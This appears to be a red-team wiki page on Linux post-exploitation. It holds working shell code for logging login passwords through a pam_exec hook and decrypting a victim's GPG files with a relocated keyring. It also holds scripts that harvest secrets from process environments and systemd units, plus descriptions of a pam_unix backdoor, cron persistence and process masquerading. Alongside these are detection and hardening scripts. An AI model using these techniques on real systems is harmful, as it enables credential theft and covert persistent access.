Linux Post-Exploitation

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sniffing Logon Passwords with PAM

Let's configure a PAM module to log every password each user types when logging in. If you don't know what PAM is, check:

PAM - Pluggable Authentication Modules

For more details check the original post. This is just a summary:

Technique overview: Pluggable Authentication Modules (PAM) give Unix-based systems a flexible way to manage authentication. They can strengthen security by customising login procedures, but they also introduce risk when misused. This summary describes a technique for capturing login credentials through PAM, together with mitigation strategies.

Capturing login credentials:

  • A shell script named toomanysecrets.sh is prepared to log login attempts, writing the date, the username ($PAM_USER), the password (read from stdin) and the remote host IP ($PAM_RHOST) to /var/log/toomanysecrets.log.
  • The script is made executable and hooked into the PAM configuration (common-auth) through the pam_exec.so module, with options to run quietly and to expose the authentication token (the password) to the script.
  • The technique shows how a compromised Linux host can be used to log credentials covertly.
#!/bin/sh
# /usr/local/bin/toomanysecrets.sh: with expose_authtok, pam_exec.so passes the password to the script on stdin
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log

# Deployment (the log file, not the script, lives under /var/log)
sudo touch /var/log/toomanysecrets.log
sudo chmod 770 /var/log/toomanysecrets.log   # pam_exec runs the script as the uid of the authenticating service, which must be able to append
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

Backdooring PAM

For further details check the original post. This is just a summary:

Pluggable Authentication Modules (PAM) is the framework Linux uses for user authentication. It works on three main concepts: username, password and service. The per-service configuration files live in /etc/pam.d/, and shared libraries do the actual authentication.

Objective: modify PAM so that authentication succeeds with a specific password, bypassing the user's real one. The target is the shared library pam_unix.so used by the common-auth file, which almost every service includes for password verification.

Steps for Modifying pam_unix.so:

  1. Locate the authentication directive in the common-auth file:
  • The line responsible for checking the user's password calls pam_unix.so.
  2. Modify the source code:
  • Add a conditional to the pam_unix_auth.c source file that grants access when the predefined password is supplied and otherwise falls through to the normal authentication flow.
  3. Recompile and replace the modified pam_unix.so library in the appropriate directory.
  4. Testing:
  • Access is granted to the various services (login, ssh, sudo, su, screensaver) with the predefined password, while normal authentication keeps working as before.
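As an added example (not from the original post or from the linked tool), the following shell functions check a host for the two PAM tamperings described above: an active pam_exec.so line that receives the password via expose_authtok, and a pam_unix.so whose checksum no longer matches what the package manager recorded. Directory and file paths are parameters so the checks can be pointed at a copied /etc/pam.d or a mounted image; the md5sums layout assumed is Debian's /var/lib/dpkg/info/<pkg>.md5sums (one "hash  path" line per file, path without leading slash).

```shell
#!/bin/sh
# Added example: audit PAM for the sniffing hook and the backdoored library.

# Print "<file>:<lineno>:<line>" for every active (uncommented) pam_exec.so line
# that carries expose_authtok, i.e. hands the cleartext password to an external
# program. Returns 0 when nothing was found, 1 otherwise.
find_pam_exec_hooks() {
    pamd_dir="${1:-/etc/pam.d}"
    hits=0
    for f in "$pamd_dir"/*; do
        [ -f "$f" ] || continue
        matches=$(grep -n 'pam_exec\.so' "$f" | grep 'expose_authtok' \
                  | grep -v '^[0-9][0-9]*:[[:space:]]*#' || true)
        [ -n "$matches" ] || continue
        printf '%s\n' "$matches" | while IFS= read -r m; do
            printf '%s:%s\n' "$f" "$m"
        done
        hits=$((hits + 1))
    done
    [ "$hits" -eq 0 ]
}

# Compare the on-disk pam_unix.so against the checksum the package manager
# recorded at install time (Debian: /var/lib/dpkg/info/libpam-modules:amd64.md5sums).
# $3 overrides the lookup key, e.g. "usr/lib/..." on a merged-/usr system.
# Returns 0 on match, 1 on mismatch, 2 when the file is not listed at all.
verify_pam_lib() {
    md5file="$1"; lib="$2"; rel="${3:-${lib#/}}"
    actual=$(md5sum "$lib" | cut -d' ' -f1)
    expected=$(grep "[[:space:]]$rel\$" "$md5file" | head -n 1 | cut -d' ' -f1)
    if [ -z "$expected" ]; then
        printf 'no packaged checksum for %s\n' "$rel"
        return 2
    fi
    if [ "$actual" = "$expected" ]; then
        printf 'OK %s\n' "$lib"
        return 0
    fi
    printf 'MISMATCH %s packaged=%s actual=%s\n' "$lib" "$expected" "$actual"
    return 1
}
```

The packaged equivalents are `dpkg -V libpam-modules` on Debian and `rpm -V pam` on RPM systems; both trust the local package database, so on a box where the attacker had root, compare against a known-good copy of the library as well, and look at the module's mtime next to its neighbours in the same directory.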

Tip

You can automate this process with https://github.com/zephrax/linux-pam-backdoor

Decrypting GPG loot via homedir relocation

If you come across an encrypted .gpg file together with a user's ~/.gnupg directory (pubring, private-keys, trustdb) but cannot decrypt because of GnuPG homedir permissions or locks, copy the keyring to a writable location and use that as your GPG home.

Typical errors you will see without this: “unsafe ownership on homedir”, “failed to create temporary file”, or “decryption failed: No secret key” (because GPG cannot read/write the original homedir).

Workflow:

# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/
# 2) Ensure ownership & perms are sane for gnupg
chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg
chmod 700 /dev/shm/fakehome/.gnupg
# 3) Decrypt using the relocated homedir (either flag works)
GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg

If the secret key material is present in private-keys-v1.d, GPG will unlock it and decrypt without asking for a passphrase (or will prompt if the key is passphrase-protected).
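The same relocation as a reusable script, added here as an example (not from the original page): stage_gpg_home copies the keyring the way the commands above do, but also removes stale lock files and agent sockets left by the victim's session, fixes ownership and modes, and reports whether secret key material actually came along; gpg_decrypt_with_home then decrypts with --batch so that a protected key fails fast instead of blocking on a prompt. The function names, the optional passphrase argument and the paths are assumptions for illustration.

```shell
#!/bin/sh
# Added example: relocate a looted ~/.gnupg and decrypt with it.

# stage_gpg_home SRC DST: copy SRC (the victim's .gnupg) into DST, which we own.
# Returns 0 if secret key material is present, 1 if only public data came along,
# 2 if SRC does not exist.
stage_gpg_home() {
    src="$1"; dst="$2"
    [ -d "$src" ] || { printf 'no such keyring dir: %s\n' "$src" >&2; return 2; }
    mkdir -p "$dst"
    # Plain cp (no -p) so the copies are owned by us. Agent sockets cannot be
    # copied and only produce noise, hence the redirect.
    cp -r "$src/." "$dst/" 2>/dev/null || true
    # Stale lock files (.#lk...) and gpg-agent sockets from the victim's session
    # make gpg wait or complain; they are recreated as needed.
    find "$dst" \( -name '.#lk*' -o -name 'S.gpg-agent*' -o -type s \) -exec rm -f {} + 2>/dev/null
    # gpg refuses a homedir with unsafe permissions, so lock everything down.
    find "$dst" -type d -exec chmod 700 {} +
    find "$dst" -type f -exec chmod 600 {} +
    # Secret keys: private-keys-v1.d/<keygrip>.key (GnuPG 2.1+) or secring.gpg (older).
    nkeys=$(find "$dst/private-keys-v1.d" -name '*.key' 2>/dev/null | wc -l | tr -d ' ')
    if [ "$nkeys" -gt 0 ] || [ -s "$dst/secring.gpg" ]; then
        printf 'staged %s: %s secret key file(s)\n' "$dst" "$nkeys"
        return 0
    fi
    printf 'staged %s: no secret keys, only public data\n' "$dst"
    return 1
}

# gpg_decrypt_with_home HOME FILE [PASSPHRASE]: decrypt FILE with the relocated
# homedir. --batch makes a protected key fail instead of blocking on pinentry;
# pass the passphrase as $3 if you recovered it elsewhere.
gpg_decrypt_with_home() {
    home="$1"; file="$2"; pass="${3-}"
    if [ -n "$pass" ]; then
        gpg --homedir "$home" --batch --yes --pinentry-mode loopback --passphrase "$pass" -d "$file"
    else
        gpg --homedir "$home" --batch --yes -d "$file"
    fi
}
```

Usage: `stage_gpg_home /home/victim/.gnupg /dev/shm/fakehome/.gnupg && gpg_decrypt_with_home /dev/shm/fakehome/.gnupg /home/victim/backup/secrets.gpg`. Stage into tmpfs (/dev/shm) rather than disk when you can, and wipe the staged copy when done.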

Harvesting credentials from process environments (including containers)

When you get code execution inside a service, the process often inherits sensitive environment variables. These are prime material for lateral movement.

Quick wins

  • Dump the current process's env: env or printenv
  • Dump another process's env: tr '\0' '\n' </proc/<PID>/environ | sed -n '1,200p'
  • Fall back to strings /proc/<PID>/environ if tr/sed are unavailable
  • In containers, also check PID 1: tr '\0' '\n' </proc/1/environ

What to look for

  • App secrets and admin creds (for example, Grafana sets GF_SECURITY_ADMIN_USER, GF_SECURITY_ADMIN_PASSWORD)
  • API keys, DB URIs, SMTP creds, OAuth secrets
  • Proxy and TLS overrides: http_proxy, https_proxy, SSL_CERT_FILE, SSL_CERT_DIR

Notes

  • Many orchestrators pass sensitive settings through env; these are inherited by children and exposed to any shell you spawn in the process context.
  • In some cases those creds are reused system-wide (for example the same username/password works for SSH on the host), allowing an easy pivot.

Credentials stored by systemd in unit files (Environment=)

Services started by systemd may carry credentials inside their unit files as Environment= entries. Enumerate and harvest them:

# Unit files and drop-ins
ls -la /etc/systemd/system /lib/systemd/system
# Grep for inline secrets (drop-ins under <unit>.d/ are matched too because of -R)
sudo grep -R "^Environment=" /etc/systemd/system /lib/systemd/system 2>/dev/null
# Example of a root-run web panel
# [Service]
# Environment="BASIC_AUTH_USER=root"
# Environment="BASIC_AUTH_PWD=<password>"
# ExecStart=/usr/bin/crontab-ui
# User=root

Operational artefacts often leak passwords (for example backup scripts that call zip -P <pwd>). Those values are frequently reused in internal web UIs (Basic-Auth) or other services.
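As an added example (not from the original page), a small harvester that covers both passages above: scan_proc_environ walks every readable /proc/<pid>/environ, and scan_systemd_units greps unit files and drop-ins for Environment= lines with a secret-looking name and for every EnvironmentFile= reference, printing the referenced file's mode since that is what the hardening below depends on. The name heuristic in SECRET_NAME_RE is an assumption chosen here, and both functions take their root directories as arguments so they also run against a copied /proc or unit tree.

```shell
#!/bin/sh
# Added example: harvest credential-looking settings from process environments
# and systemd unit files.

# Heuristic for variable names worth reading (ERE, matched case-insensitively).
SECRET_NAME_RE='PASS|PASSWD|PWD|SECRET|TOKEN|KEY|CRED|URI|URL|PROXY'

# scan_proc_environ [PROC_ROOT]: print "<pid> <comm> <NAME=value>" for every
# matching variable of every process whose environ we may read (our own
# processes, or all of them as root). PROC_ROOT defaults to /proc.
scan_proc_environ() {
    proc="${1:-/proc}"
    for p in "$proc"/[0-9]*; do
        [ -r "$p/environ" ] || continue
        pid=${p##*/}
        comm=$(cat "$p/comm" 2>/dev/null || echo '?')
        tr '\0' '\n' < "$p/environ" \
            | grep -iE "^[A-Z0-9_]*($SECRET_NAME_RE)[A-Z0-9_]*=" \
            | grep -vE '^(PWD|OLDPWD)=' \
            | while IFS= read -r kv; do
                  printf '%s %s %s\n' "$pid" "$comm" "$kv"
              done
    done
    return 0
}

# scan_systemd_units [DIR...]: print "<unit>:<lineno>:<line>" for Environment=
# lines with a secret-looking name and for every EnvironmentFile= reference,
# followed by "    -> <ls -l of that file>" when it exists. Defaults to the
# usual unit directories; drop-ins are the *.conf files under <unit>.d/.
scan_systemd_units() {
    [ $# -gt 0 ] || set -- /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
    for dir; do
        [ -d "$dir" ] || continue
        find "$dir" -type f \( -name '*.service' -o -name '*.socket' -o -name '*.timer' -o -name '*.conf' \) 2>/dev/null \
            | while IFS= read -r unit; do
                  grep -nE '^[[:space:]]*(Environment|EnvironmentFile)=' "$unit" 2>/dev/null \
                      | grep -iE "$SECRET_NAME_RE|EnvironmentFile=" \
                      | while IFS= read -r hit; do
                            printf '%s:%s\n' "$unit" "$hit"
                            case "$hit" in
                                *EnvironmentFile=*)
                                    # A leading "-" means "ignore if missing"; strip it for the stat.
                                    ef=${hit#*EnvironmentFile=}; ef=${ef#-}
                                    if [ -e "$ef" ]; then printf '    -> %s\n' "$(ls -l "$ef")"; fi
                                    ;;
                            esac
                        done
              done
    done
    return 0
}
```

Run both as root where possible; as an unprivileged user scan_proc_environ only sees your own processes, which is still exactly the set you inherited from the compromised service.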

Hardening

  • Move secrets into dedicated secret stores (systemd-ask-password, an EnvironmentFile= with locked-down permissions, systemd's LoadCredential=, or an external secret manager)
  • Avoid embedding creds directly in unit files; use root-only readable drop-in or environment files instead and keep them out of version control
  • Rotate any leaked passwords discovered during an engagement
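One way to carry out the EnvironmentFile= item above, added here as an example rather than anything from the original page: move_env_to_file pulls the Environment= assignments out of a unit file into a mode-0600 file and points the unit at it through a drop-in, so the unit file itself (usually world-readable and often committed to configuration management) no longer carries the secret. The drop-in name 10-secrets.conf, the helper env_file_is_locked and the one-assignment-per-line limitation are assumptions of this script.

```shell
#!/bin/sh
# Added example: move inline Environment= secrets out of a systemd unit file.

# move_env_to_file UNIT_FILE ENV_FILE [DROPIN_DIR]
#   UNIT_FILE  : e.g. /etc/systemd/system/crontab-ui.service
#   ENV_FILE   : where the KEY=value lines go, created with mode 0600
#   DROPIN_DIR : defaults to <UNIT_FILE>.d; receives 10-secrets.conf with EnvironmentFile=
# Handles the common one-assignment-per-line form, quoted or not; a line such as
# Environment="A=1" "B=2" would need splitting first. Prints the number moved.
move_env_to_file() {
    unit="$1"; envfile="$2"; dropin_dir="${3:-$unit.d}"
    [ -f "$unit" ] || { printf 'no such unit: %s\n' "$unit" >&2; return 2; }
    # Create the env file already closed to group/others, then fill it.
    ( umask 077; : > "$envfile" )
    chmod 600 "$envfile"
    # Environment=KEY=value or Environment="KEY=value"  ->  KEY=value
    grep -E '^[[:space:]]*Environment=' "$unit" \
        | sed -E 's/^[[:space:]]*Environment=//; s/^"(.*)"$/\1/' >> "$envfile" || true
    moved=$(wc -l < "$envfile" | tr -d ' ')
    if [ "$moved" -eq 0 ]; then
        rm -f "$envfile"
        printf 'nothing to move in %s\n' "$unit"
        return 1
    fi
    # Rewrite the unit without the inline secrets (no sed -i, so any sed works).
    grep -vE '^[[:space:]]*Environment=' "$unit" > "$unit.tmp" && mv "$unit.tmp" "$unit"
    # Drop-ins are merged into the unit; EnvironmentFile= is additive.
    mkdir -p "$dropin_dir"
    printf '[Service]\nEnvironmentFile=%s\n' "$envfile" > "$dropin_dir/10-secrets.conf"
    printf 'moved %s assignment(s) from %s to %s\n' "$moved" "$unit" "$envfile"
    return 0
}

# env_file_is_locked FILE: true when neither group nor others have any bits set.
env_file_is_locked() {
    [ "$(ls -l "$1" | cut -c5-10)" = "------" ]
}
```

Run it as root so the env file is root-owned, then `systemctl daemon-reload && systemctl restart <unit>` and confirm with `systemctl show <unit> -p Environment` that the values still reach the service. The file is now only as safe as root on that host, which is the point: an unprivileged foothold in the service no longer reads it from the unit.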

Cron-based persistence with a loopback mutex

  • Copy implants to several writable paths (/tmp, /var/tmp, /dev/shm, /run/lock) and add cron entries such as */5 * * * * /tmp/<bin> so they are restarted even after being deleted elsewhere.
  • Enforce single-instance execution by binding a fixed loopback port (for example 127.0.0.1:51125 or 127.0.0.1:52225) and exiting if bind() fails; ss -lntp | grep -E '51125|52225' shows the mutex listener.
  • Operators may periodically bulk-kill any process whose cmdline contains the dropper name (e.g. init_stop), so reusing those names during analysis can cause collisions; pick unique filenames.

Process masquerading via prctl + argv overwrite

  • Set a short process name with prctl(PR_SET_NAME, "<label>") (comm is limited to 15 bytes), often init, so that /proc/<pid>/status and GUIs show an innocuous label.
  • Overwrite the argv[0] memory buffer after reading the length of /proc/self/cmdline and the argv[0] pointer, padding with NULs so that /proc/<pid>/cmdline and ps show the fake label as well.
  • Detect by comparing Name: in /proc/<pid>/status with the real executable path (/proc/<pid>/exe) and by looking for loopback mutex listeners owned by processes with short or blanked-out cmdlines.
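An added example (not from the original page) with three hunts for the behaviour described in the last two sections: cron entries whose binary lives in one of the staging directories listed above, loopback-only listeners parsed from `ss -lntp` output, and processes whose comm disagrees with their executable's basename or whose executable sits in a writable directory or has been deleted. The writable-directory list and the output formats are assumptions of this script; the column layout parsed is that of iproute2's `ss -lntp`.

```shell
#!/bin/sh
# Added example: hunt for the cron + loopback-mutex + renamed-process pattern.

WRITABLE_DIRS_RE='^(/tmp|/var/tmp|/dev/shm|/run/lock)(/|$)'

# suspicious_cron_entries FILE...: print "<file>:<lineno>:<entry>" for every
# entry whose command path starts in a writable staging directory. Works for
# user crontabs (5 fields + command), system ones (5 fields + user + command)
# and @reboot-style schedules.
suspicious_cron_entries() {
    for f; do
        [ -f "$f" ] || continue
        grep -nvE '^[[:space:]]*(#|$)' "$f" | while IFS= read -r line; do
            body=${line#*:}
            # The first field starting with "/" after the schedule (and optional user) is the binary.
            cmd=$(printf '%s\n' "$body" | awk '{ n = ($1 ~ /^@/) ? 2 : 6
                for (i = n; i <= NF; i++) if ($i ~ /^\//) { print $i; exit } }')
            if printf '%s\n' "$cmd" | grep -qE "$WRITABLE_DIRS_RE"; then
                printf '%s:%s\n' "$f" "$line"
            fi
        done
    done
    return 0
}

# loopback_listeners: read `ss -lntp` output on stdin and print "pid comm port"
# for every socket bound only to 127.0.0.1 (the mutex pattern). A real local
# service usually also shows peers in `ss -tn`; a mutex never accepts anything.
loopback_listeners() {
    awk '$1 == "LISTEN" && $4 ~ /^127\.0\.0\.1:/ {
        split($4, a, ":"); port = a[2]
        pid = "?"; comm = "?"
        if (match($0, /users:\(\("[^"]+",pid=[0-9]+/)) {
            u = substr($0, RSTART, RLENGTH)
            sub(/users:\(\("/, "", u)
            split(u, b, "\",pid="); comm = b[1]; pid = b[2]
        }
        print pid, comm, port
    }'
}

# masquerading_pids [PROC_ROOT]: print "<pid> <reasons> comm=<comm> exe=<exe>"
# when comm (what prctl(PR_SET_NAME) sets, 15 bytes max) differs from the
# executable's basename, or the executable is in a writable dir or deleted.
masquerading_pids() {
    proc="${1:-/proc}"
    for p in "$proc"/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue    # kernel threads have no exe
        comm=$(cat "$p/comm" 2>/dev/null) || continue
        pid=${p##*/}
        reason=""
        case "$exe" in
            *' (deleted)') reason="deleted-exe"; exe=${exe% (deleted)} ;;
        esac
        base=${exe##*/}
        short=$(printf '%s\n' "$base" | cut -c1-15)   # comm is the basename truncated to 15 bytes
        [ "$short" = "$comm" ] || reason="${reason:+$reason,}comm-mismatch"
        if printf '%s\n' "$exe" | grep -qE "$WRITABLE_DIRS_RE"; then
            reason="${reason:+$reason,}writable-dir"
        fi
        [ -z "$reason" ] || printf '%s %s comm=%s exe=%s\n' "$pid" "$reason" "$comm" "$exe"
    done
    return 0
}
```

Typical run: `suspicious_cron_entries /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*`, then `ss -lntp | loopback_listeners`, then `masquerading_pids` and cross-check the pids. comm is derived from the path handed to execve, so an interpreter reached through a symlink (python3 resolving to python3.11) produces a benign comm-mismatch; triage on the exe path and the other two signals rather than on the mismatch alone.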
